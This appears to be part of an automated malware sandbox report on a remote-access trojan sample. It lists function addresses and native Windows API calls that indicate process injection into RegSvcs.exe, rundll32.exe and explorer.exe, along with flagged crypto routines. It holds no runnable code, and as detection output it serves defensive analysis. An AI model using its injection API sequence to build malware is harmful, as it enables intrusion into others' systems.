Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_01282BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282AD0 NtReadFile,LdrInitializeThunk,	13_2_01282AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282D30 NtUnmapViewOfSection,LdrInitializeThunk,	13_2_01282D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_01282D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_01282DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282DD0 NtDelayExecution,LdrInitializeThunk,	13_2_01282DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_01282C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_01282CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282F30 NtCreateSection,LdrInitializeThunk,	13_2_01282F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282FB0 NtResumeThread,LdrInitializeThunk,	13_2_01282FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282F90 NtProtectVirtualMemory,LdrInitializeThunk,	13_2_01282F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282FE0 NtCreateFile,LdrInitializeThunk,	13_2_01282FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_01282EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282E80 NtReadVirtualMemory,LdrInitializeThunk,	13_2_01282E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01284340 NtSetContextThread,	13_2_01284340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01284650 NtSuspendThread,	13_2_01284650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282BA0 NtEnumerateValueKey,	13_2_01282BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282B80 NtQueryInformationFile,	13_2_01282B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282BE0 NtQueryValueKey,	13_2_01282BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282AB0 NtWaitForSingleObject,	13_2_01282AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282AF0 NtWriteFile,	13_2_01282AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282D00 NtSetInformationFile,	13_2_01282D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282DB0 NtEnumerateKey,	13_2_01282DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282C00 NtQueryInformationProcess,	13_2_01282C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282C60 NtCreateKey,	13_2_01282C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282CF0 NtOpenProcess,	13_2_01282CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282CC0 NtQueryVirtualMemory,	13_2_01282CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282F60 NtCreateProcessEx,	13_2_01282F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282FA0 NtQuerySection,	13_2_01282FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282E30 NtWriteVirtualMemory,	13_2_01282E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282EE0 NtQueueApcThread,	13_2_01282EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283010 NtOpenDirectoryObject,	13_2_01283010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283090 NtSetValueKey,	13_2_01283090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012835C0 NtCreateMutant,	13_2_012835C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012839B0 NtGetContextThread,	13_2_012839B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283D10 NtOpenProcessToken,	13_2_01283D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283D70 NtOpenThread,	13_2_01283D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00725CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,	15_2_00725CF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_007240B1 NtQuerySystemInformation,	15_2_007240B1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00725D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,	15_2_00725D6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00724136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,	15_2_00724136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82CA0 NtQueryInformationToken,LdrInitializeThunk,	15_2_04C82CA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82C60 NtCreateKey,LdrInitializeThunk,	15_2_04C82C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82C70 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_04C82C70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82DD0 NtDelayExecution,LdrInitializeThunk,	15_2_04C82DD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82DF0 NtQuerySystemInformation,LdrInitializeThunk,	15_2_04C82DF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82D10 NtMapViewOfSection,LdrInitializeThunk,	15_2_04C82D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_04C82EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82FE0 NtCreateFile,LdrInitializeThunk,	15_2_04C82FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82F30 NtCreateSection,LdrInitializeThunk,	15_2_04C82F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82AD0 NtReadFile,LdrInitializeThunk,	15_2_04C82AD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82BE0 NtQueryValueKey,LdrInitializeThunk,	15_2_04C82BE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_04C82BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82B60 NtClose,LdrInitializeThunk,	15_2_04C82B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C835C0 NtCreateMutant,LdrInitializeThunk,	15_2_04C835C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C84650 NtSuspendThread,	15_2_04C84650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C84340 NtSetContextThread,	15_2_04C84340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82CC0 NtQueryVirtualMemory,	15_2_04C82CC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82CF0 NtOpenProcess,	15_2_04C82CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82C00 NtQueryInformationProcess,	15_2_04C82C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82DB0 NtEnumerateKey,	15_2_04C82DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82D00 NtSetInformationFile,	15_2_04C82D00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82D30 NtUnmapViewOfSection,	15_2_04C82D30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82EE0 NtQueueApcThread,	15_2_04C82EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82E80 NtReadVirtualMemory,	15_2_04C82E80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82E30 NtWriteVirtualMemory,	15_2_04C82E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82F90 NtProtectVirtualMemory,	15_2_04C82F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82FA0 NtQuerySection,	15_2_04C82FA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82FB0 NtResumeThread,	15_2_04C82FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82F60 NtCreateProcessEx,	15_2_04C82F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82AF0 NtWriteFile,	15_2_04C82AF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82AB0 NtWaitForSingleObject,	15_2_04C82AB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82B80 NtQueryInformationFile,	15_2_04C82B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82BA0 NtEnumerateValueKey,	15_2_04C82BA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83090 NtSetValueKey,	15_2_04C83090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83010 NtOpenDirectoryObject,	15_2_04C83010
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83D70 NtOpenThread,	15_2_04C83D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83D10 NtOpenProcessToken,	15_2_04C83D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C839B0 NtGetContextThread,	15_2_04C839B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A370 NtCreateFile,	15_2_02B6A370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A4A0 NtClose,	15_2_02B6A4A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A420 NtReadFile,	15_2_02B6A420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A550 NtAllocateVirtualMemory,	15_2_02B6A550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A49A NtClose,	15_2_02B6A49A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A41C NtReadFile,	15_2_02B6A41C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	15_2_04AAA036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	15_2_04AA9BAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAA042 NtQueryInformationProcess,	15_2_04AAA042
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	15_2_04AA9BB2

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_02B6D5DC	0_2_02B6D5DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309668	0_2_07309668
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309658	0_2_07309658
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07300400	0_2_07300400
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_073003F0	0_2_073003F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07307E60	0_2_07307E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309ED8	0_2_07309ED8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07307A28	0_2_07307A28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309AA0	0_2_07309AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309A90	0_2_07309A90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_0BEF1118	0_2_0BEF1118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130100	7_2_01130100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186000	7_2_01186000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011C02C0	7_2_011C02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011965B2	7_2_011965B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011965D0	7_2_011965D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164750	7_2_01164750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115C6E0	7_2_0115C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114A840	7_2_0114A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01178890	7_2_01178890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011268F1	7_2_011268F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E8F0	7_2_0116E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114ED7A	7_2_0114ED7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158DBF	7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01148DC0	7_2_01148DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130CF2	7_2_01130CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160F30	7_2_01160F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01182F28	7_2_01182F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40	7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BEFA0	7_2_011BEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132FC8	7_2_01132FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140E59	7_2_01140E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152ED9	7_2_01152ED9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112F172	7_2_0112F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117516C	7_2_0117516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114B1B0	7_2_0114B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011433F3	7_2_011433F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011452A0	7_2_011452A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115D2F0	7_2_0115D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01143497	7_2_01143497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011874E0	7_2_011874E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114B730	7_2_0114B730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01149950	7_2_01149950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115B950	7_2_0115B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01131979	7_2_01131979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011459DA	7_2_011459DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AD800	7_2_011AD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011438E0	7_2_011438E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115FB80	7_2_0115FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B5BF0	7_2_011B5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117DBF9	7_2_0117DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B3A6C	7_2_011B3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01143D40	7_2_01143D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115FDC0	7_2_0115FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B9C32	7_2_011B9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01159C20	7_2_01159C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01141F92	7_2_01141F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01149EB0	7_2_01149EB0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_051DD5DC	8_2_051DD5DC
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309668	8_2_07309668
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309658	8_2_07309658
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07300400	8_2_07300400
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073003F0	8_2_073003F0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073003C8	8_2_073003C8
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07307E60	8_2_07307E60
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309ED8	8_2_07309ED8
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309AA0	8_2_07309AA0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309A90	8_2_07309A90
Source: C:\Windows\explorer.exe	Code function: 9_2_0E396232	9_2_0E396232
Source: C:\Windows\explorer.exe	Code function: 9_2_0E395036	9_2_0E395036
Source: C:\Windows\explorer.exe	Code function: 9_2_0E38C082	9_2_0E38C082
Source: C:\Windows\explorer.exe	Code function: 9_2_0E390B30	9_2_0E390B30
Source: C:\Windows\explorer.exe	Code function: 9_2_0E390B32	9_2_0E390B32
Source: C:\Windows\explorer.exe	Code function: 9_2_0E393912	9_2_0E393912
Source: C:\Windows\explorer.exe	Code function: 9_2_0E38DD02	9_2_0E38DD02
Source: C:\Windows\explorer.exe	Code function: 9_2_0E3995CD	9_2_0E3995CD
Source: C:\Windows\explorer.exe	Code function: 9_2_104F8036	9_2_104F8036
Source: C:\Windows\explorer.exe	Code function: 9_2_104EF082	9_2_104EF082
Source: C:\Windows\explorer.exe	Code function: 9_2_104F0D02	9_2_104F0D02
Source: C:\Windows\explorer.exe	Code function: 9_2_104F6912	9_2_104F6912
Source: C:\Windows\explorer.exe	Code function: 9_2_104FC5CD	9_2_104FC5CD
Source: C:\Windows\explorer.exe	Code function: 9_2_104F9232	9_2_104F9232
Source: C:\Windows\explorer.exe	Code function: 9_2_104F3B32	9_2_104F3B32
Source: C:\Windows\explorer.exe	Code function: 9_2_104F3B30	9_2_104F3B30
Source: C:\Windows\explorer.exe	Code function: 9_2_1063C036	9_2_1063C036
Source: C:\Windows\explorer.exe	Code function: 9_2_10633082	9_2_10633082
Source: C:\Windows\explorer.exe	Code function: 9_2_10634D02	9_2_10634D02
Source: C:\Windows\explorer.exe	Code function: 9_2_1063A912	9_2_1063A912
Source: C:\Windows\explorer.exe	Code function: 9_2_106405CD	9_2_106405CD
Source: C:\Windows\explorer.exe	Code function: 9_2_1063D232	9_2_1063D232
Source: C:\Windows\explorer.exe	Code function: 9_2_10637B32	9_2_10637B32
Source: C:\Windows\explorer.exe	Code function: 9_2_10637B30	9_2_10637B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00401026	13_2_00401026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00401030	13_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041EB5E	13_2_0041EB5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041E53C	13_2_0041E53C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402D89	13_2_00402D89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402D90	13_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041DDB4	13_2_0041DDB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00409E60	13_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041DF38	13_2_0041DF38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D7FE	13_2_0041D7FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402FB0	13_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01240100	13_2_01240100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012EA118	13_2_012EA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012D8158	13_2_012D8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013041A2	13_2_013041A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013101AA	13_2_013101AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013081CC	13_2_013081CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012E2000	13_2_012E2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130A352	13_2_0130A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125E3F0	13_2_0125E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013103E6	13_2_013103E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F0274	13_2_012F0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012D02C0	13_2_012D02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250535	13_2_01250535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01310591	13_2_01310591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F4420	13_2_012F4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01302446	13_2_01302446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012FE4F6	13_2_012FE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250770	13_2_01250770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01274750	13_2_01274750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0124C7C0	13_2_0124C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126C6E0	13_2_0126C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01266962	13_2_01266962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012529A0	13_2_012529A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0131A9A6	13_2_0131A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01252840	13_2_01252840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125A840	13_2_0125A840
